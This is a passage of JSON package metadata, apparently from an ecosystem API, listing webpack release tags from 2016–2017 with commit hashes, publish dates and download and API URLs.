5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/